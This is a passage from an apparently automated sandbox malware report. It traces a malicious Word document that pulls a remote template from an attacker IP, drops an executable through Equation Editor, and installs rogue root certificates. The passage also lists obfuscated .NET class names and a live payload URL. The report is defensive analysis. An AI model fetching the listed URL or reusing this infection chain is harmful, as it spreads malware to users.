                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_002192C4 push esp; retf 10_2_002192C5
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_00219332 push ebx; retf 10_2_00219333
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_00219315 push ebx; retf 10_2_00219316
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_00219346 push ebx; retf 10_2_00219347
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021935D push ebx; retf 10_2_0021935E
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D214D push ebx; iretd 13_2_003D21EA
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_006190F8 pushfd ; retn 0056h13_2_006190F9
                  Source: H363BpKqz0MdVd7[1].exe.9.drStatic PE information: section name: .text entropy: 7.956942148046824
                  Source: millitingacy20306.exe.9.drStatic PE information: section name: .text entropy: 7.956942148046824
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, nMkqWItOThCtKV1dNC.csHigh entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, R1ccbUdiuKavfKwOiv.csHigh entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, piA8kBwf8uSnQBkXIf.csHigh entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iCoOLXYlNl0mxrb2OV.csHigh entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2Kwk8N6ZXA7TrM6cD.csHigh entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, gp45D2kqZ1t0SupgjDp.csHigh entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, A2AAfCzfetqLVaEsaJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.csHigh entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, LB9OfaymN1hyy4IOhE.csHigh entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, W2ykdW3Am2b4r0yX4J.csHigh entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, VIYLCOLmp9IJAk2PZn.csHigh entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, HOywRAxWLhf94FxxiR.csHigh entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, lr6D7krRwJpAs5DJI9.csHigh entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, kdgnP2lRDcDXOsF1YV.csHigh entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, w1hPeBSJBRtHWHPfGs.csHigh entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, WxtM0d8xtsSb4gH5rt.csHigh entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UxbJeVopTxfRmWCZ5e.csHigh entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.csHigh entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, Fj4y7cbUAU8ypRwety.csHigh entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, TnNsaokGxfgWcajJlHc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
                  Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, UtxCOWKt6ay2Ld6OyO.csHigh entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, nMkqWItOThCtKV1dNC.csHigh entropy of concatenated method names: 'Kheuo1D6E8', 'BxguV3Qqhi', 'Ekhu3erEFX', 'K1BuSMEhnG', 'hCgutOcQoy', 'm0qudKv1sg', 'tWCuZwcH7H', 'OpgubjMPV0', 'V4xukjf6qI', 'j7yu1Wl7Ct'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, R1ccbUdiuKavfKwOiv.csHigh entropy of concatenated method names: 'Inr4XVd4yh', 'oMf4Mcjjy9', 'aPj4F5XVJp', 'jet4fyqoyM', 'Wxp4tWvH2P', 'Cm34dp637R', 'mkih4jFitxVROj2J50', 'ubh3YeQ2JsSmMplcdk', 'wVb44itlFy', 'Q3e4UNg7dV'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, piA8kBwf8uSnQBkXIf.csHigh entropy of concatenated method names: 'HumZFQTxsI', 'r1rZfAG9Ao', 'ToString', 'jcFZqeXIrG', 'z9BZcGHuTQ', 'w3tZugig2D', 'm4CZRKV25X', 'DwJZl5IMdc', 'cJ2ZXWahIl', 'xdYZMg5m3v'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iCoOLXYlNl0mxrb2OV.csHigh entropy of concatenated method names: 'aFdZjcjVBI', 'hSpZ6bVtiH', 'PFHbarDev3', 'nHnb4IPVbV', 'c9tZYJ4ZZQ', 'WYAZhUrd6n', 'kAIZ2JHbA8', 'uK4Zijl1nD', 'giVZE8LiSg', 'cxXZJLtQAH'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2Kwk8N6ZXA7TrM6cD.csHigh entropy of concatenated method names: 'WMwA3I3W0H', 'SGoASpgd1q', 'mhPABfI8ap', 'zcOA84oPtM', 'bbiAOG9trp', 'Al5ALapfuN', 'BYNAWRqKwP', 'SOcA0nRgsQ', 'gMHAQaBTOo', 'hdWAYDQkWj'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, gp45D2kqZ1t0SupgjDp.csHigh entropy of concatenated method names: 'yiAk5HBROL', 'hL3kDKyNLa', 'enDkC153Y4', 'TJfkoWKXLH', 'Pcjk9QDtwV', 'bIhkVmJni8', 'JNtkgqnrch', 'HBYk3aYnav', 'qsqkSIUtJP', 's6bkrDDVQ5'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, A2AAfCzfetqLVaEsaJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xkVkAo9w72', 'lomktDYGPc', 'LVgkduTyVM', 'R4EkZJc31p', 'V58kbTu9IL', 's6LkkHhHI4', 'FLak1bNu6l'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.csHigh entropy of concatenated method names: 'rSIciM7NjJ', 'WWkcEjQPmS', 'OJkcJ5l9At', 'jX7ceZdBe8', 'lmvcmEXkS9', 'Ay1cH2iADI', 'g2Vc7fRXBs', 'qOWcjN0R0J', 'HxWcGkEpS0', 'NX9c6qusdv'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, LB9OfaymN1hyy4IOhE.csHigh entropy of concatenated method names: 'Q0IR986xkP', 'c42RgxwxRm', 'sKluIVdjae', 'f2VuOADq56', 'Mc9uLB55Sv', 'XaeuPjYNdQ', 'tjAuWu4F1P', 'dsEu0Yuitq', 'AnGuvCINkQ', 'C0YuQFko7d'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, W2ykdW3Am2b4r0yX4J.csHigh entropy of concatenated method names: 'pXqX5qU8lk', 'TBKXDIO1Qd', 'Ux2XCVjY5X', 'yruXo1oBOj', 'IMGX9KgSTq', 'NBdXVKQGP9', 'zG3XgcK9jI', 'FXAX34LLae', 'GxoXSWCPVJ', 'gDcXr5S8IE'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, VIYLCOLmp9IJAk2PZn.csHigh entropy of concatenated method names: 'rtik4v0KeY', 'QFjkUuqm3R', 'rlqkTekE4n', 'EwDkqx57ta', 'GWikcnZHJA', 'CCBkR2NFeV', 'vcXkl9Qmdx', 'jDcb7eKMQ7', 'WbrbjHhoH1', 'PaMbGTnyZu'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, HOywRAxWLhf94FxxiR.csHigh entropy of concatenated method names: 'G5dbBJQqbo', 'Oeob8MA3Ga', 'bi2bIEwmFj', 'zM3bOXFKyS', 'OPIbinHY0a', 'sYObLugFyu', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, lr6D7krRwJpAs5DJI9.csHigh entropy of concatenated method names: 'Dispose', 'x754GTAp2J', 'BLcp8labQo', 'gXDssev9mP', 'y6446XUknW', 'd1l4zfevfT', 'ProcessDialogKey', 'BZSpaGEn6c', 'BBGp46UjQU', 'TLbppXEuaP'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, kdgnP2lRDcDXOsF1YV.csHigh entropy of concatenated method names: 'th6lNfRi6q', 'noFlcTrRu4', 'zTPlR5HLkM', 'JG3lXfalYL', 'eoPlMLj5nm', 'sJZRmGmGkd', 'i7wRHS6OHB', 'u3YR73qrIn', 'tStRju5BtW', 't1kRGOLlZ0'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, w1hPeBSJBRtHWHPfGs.csHigh entropy of concatenated method names: 'zEsXq74pXx', 'JbfXu6BIDA', 'x6TXlpE6NJ', 'eGBl6JIqug', 'Cijlzmr7ff', 'fRWXaCpl1L', 'wfaX4bu5Ik', 'v2kXpkmUXY', 'DPmXU4FONk', 'DMmXTmmagd'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, WxtM0d8xtsSb4gH5rt.csHigh entropy of concatenated method names: 'PDRCSE6g3', 'KQ7oSs8Ts', 'ovMVGW9Fh', 'F9sgrK1gC', 'utKSooaNq', 'bV0rWZbG3', 'bdNGekN5d3K4VUNith', 'DKYscp0mbxHK2Jb0yG', 'R9DbHeusW', 'Jcg10ByYf'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UxbJeVopTxfRmWCZ5e.csHigh entropy of concatenated method names: 'ToString', 'iBkdYWrWkG', 'Ot8d8uuUK2', 'DnjdIOoN9V', 'MVKdOphAMO', 'mhmdLgVGr7', 'OlSdPVaK3M', 'IAOdW1X7PW', 'jLsd0Giw4h', 'u9bdvSrutG'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.csHigh entropy of concatenated method names: 'mBgUN13te4', 'R57Uqtu6qQ', 'MnqUcANdqH', 'qZNUuUpaRy', 'jf5URlj3ly', 'FSfUlymF7c', 'EkfUXGByaU', 'bEuUMSC826', 'CITUKvsdI5', 'AlKUFJk1sI'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, Fj4y7cbUAU8ypRwety.csHigh entropy of concatenated method names: 'Kgcbq0OGyw', 'IPtbccWnBi', 'gwqbu1SM4h', 'YRMbRi0xTL', 'EIMblIj29V', 'j9HbXEhjrq', 'UL9bMLoC35', 'xrLbKyLKGH', 'QQSbFmDS9r', 'RvnbfCTonl'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, TnNsaokGxfgWcajJlHc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WkX1iPyZcr', 'Awu1Eq6Vhm', 'uTQ1JmViwV', 'En11eYNIFk', 'yyl1mKXgd5', 'btQ1HUcExl', 'ymR17g9Gwx'
                  Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, UtxCOWKt6ay2Ld6OyO.csHigh entropy of concatenated method names: 'IOEtQ0B1VS', 'heTthRWboI', 'NWvtihJFVv', 'K1itES4Ifn', 'WiCt8fJ2G0', 'DdGtIr6f7Y', 'StgtOoIYmv', 'WxQtLhjWct', 'b3utPNOGP1', 'nM0tW9cKFL'
                  Source: 10.2.millitingacy20306.exe.990000.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

                  Persistence and Installation Behavior

                  barindex
                  Microsoft Office launches external ms-search protocol handler (WebDAV)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\66.63.187.123\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\66.63.187.123\DavWWWRootJump to behavior
                  Contains an external reference to another file
                  Source: settings.xml.relsExtracted files from sample: http://66.63.187.123/txt/millizxc.doc
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Office viewer loads remote template
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\millitingacy20306.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
